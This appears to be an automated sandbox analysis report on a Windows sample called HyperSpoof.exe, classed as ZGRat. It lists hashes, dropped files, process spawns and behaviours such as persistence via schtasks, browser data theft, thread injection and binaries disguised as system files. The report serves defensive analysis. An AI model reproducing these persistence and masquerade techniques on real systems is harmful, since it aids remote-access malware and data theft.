SHA1 fc79e5088c9df79bcd8e53d0b95661c3b5396806
SHA256 ae70f0f9798da6edcd90c47a9a8019a36cdf35a3794a99cd14512d1a1994cbf5
SHA512 4c077177207269bf7b5866376c59e84343b25093a4cf76e8e09cf17400962f97d86463cea4c83286d4451fd7810b3ad638972436adcba61ad57c3ba47e85ce2e

memory/2400-170-0x0000000000E50000-0x0000000001054000-memory.dmp

memory/2400-172-0x0000000000320000-0x000000000032E000-memory.dmp

memory/2400-174-0x0000000000350000-0x000000000036C000-memory.dmp

memory/2400-176-0x0000000000370000-0x0000000000388000-memory.dmp

memory/2400-178-0x0000000000330000-0x000000000033E000-memory.dmp

memory/2400-180-0x0000000000340000-0x000000000034E000-memory.dmp

memory/2400-182-0x0000000000390000-0x000000000039C000-memory.dmp

memory/2400-184-0x00000000003A0000-0x00000000003AE000-memory.dmp

memory/2400-186-0x00000000003B0000-0x00000000003BC000-memory.dmp

\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

MD5 c4d09d3b3516550ad2ded3b09e28c10c
SHA1 7a5e77bb9ba74cf57cb1d119325b0b7f64199824
SHA256 66433a06884f28fdabb85a73c682d1587767e1dfa116907559ec00ed8d0919d3
SHA512 2e7800aae592d38c4a6c854b11d0883de70f938b29d78e257ab47a8a2bbf09121145d0a9aea9b56c16e18cde31b693d31d7ebfcd0473b7c15df5d7ae6708bbd2

C:\ProgramData\Microsoft\Windows\amifldrv64.sys

MD5 785045f8b25cd2e937ddc6b09debe01a
SHA1 029c678674f482ababe8bbfdb93152392457109d
SHA256 37073e42ffa0322500f90cd7e3c8d02c4cdd695d31c77e81560abec20bfb68ba
SHA512 40bbeb41816146c7172aa3cf27dace538908b7955171968e1cddcd84403b2588e0d8437a3596c2714ccdf4476eefa3d4e61d90ea118982b729f50b03df1104a9

C:\Users\Admin\AppData\Local\Temp\4ZoQI0Qg2k.bat

MD5 2afefd7019f68a7b569ded0c589fb38c
SHA1 038fd77cc2b500dff389804cf0a33b247e1c0966
SHA256 3c2c1720929d8b111f8d33b90254c56da89f3e51eb90f7a545788589a15e6558
SHA512 48d6c47564e9077f504428c4dfc5f61e9af598f9de2e130b4cf0c70a8ae8fd2dbde6c850812d6a288f6630cda21836c76e4b12f53815f4649ab36e3079f3389a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 d46d7ee41c46eb4f295e6dd8580fafe1
SHA1 9af016e270ffc9b2a06658b1e83b1a490af22bcf
SHA256 a5c97aac08de239ff256c0956aa339d72f6f649af463303dcce9270bdd7b72a2
SHA512 1d2663cba818c0e1bd56a6ad34d6eabab0181882411ae9b4920f25b0551b399a49e1fe356a2e76b1dd0cc22b1b4ea423276f096fb2b4fc810bf15b975d3597a7

memory/776-221-0x000000001B630000-0x000000001B912000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 f8e15ec4215586e1bc45ab326d416ff7
SHA1 01b9e2b5e183e35e87cc4004d368223bd121a319
SHA256 322fbd8ea8dfe511a367f0bbcf9092ad56bbdfb41ea71fe7ca4d0ec9508695f8
SHA512 2ab103dbcb21abcec389d2ba8e5d35d3fec108dfd28e6b07f4a7112de646615c38a365cd4209ac5661025c0174ad5d0834e6ec030487efd25e0422d8b0e35b6e

memory/776-222-0x0000000002710000-0x0000000002718000-memory.dmp

memory/2208-255-0x00000000012B0000-0x00000000014B4000-memory.dmp

memory/1208-256-0x00000000026E0000-0x00000000026E8000-memory.dmp

memory/604-267-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-269-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-273-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-271-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-270-0x0000000140000000-0x000000014000E000-memory.dmp

memory/604-268-0x0000000140000000-0x000000014000E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 01:19

Reported

2024-05-09 01:22

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

ZGRat

rat zgrat

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Downloads MZ/PE file

Stops running service(s)

evasion execution

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\conhostsft.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\Windows\en-US\conhost.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\VC_redist.x64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A
N/A N/A C:\ProgramData\Microsoft\Windows\Volumeid64.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\F: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened (read-only) \??\D: C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count = "0" C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Delete value \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\NextInstance = "0" C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\Count C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\VC_redist.x64.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2500 set thread context of 2368 N/A C:\ProgramData\VC_redist.x64.exe C:\Windows\system32\conhost.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Common Files\DESIGNER\csrss.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File opened for modification C:\Program Files\Common Files\DESIGNER\csrss.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Common Files\DESIGNER\886983d96e3d3e C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files (x86)\Common Files\SearchApp.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files (x86)\Common Files\38384e6a620884 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\SppExtComObj.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Program Files\Reference Assemblies\Microsoft\e1ef82546f0b02 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\en-US\088424020bedd6 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
File created C:\Windows\ja-JP\fontdrvhost.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Windows\ja-JP\5b884080fd4f94 C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
File created C:\Windows\en-US\conhost.exe C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Driver C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0066\ C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\00000065\00000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0064 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
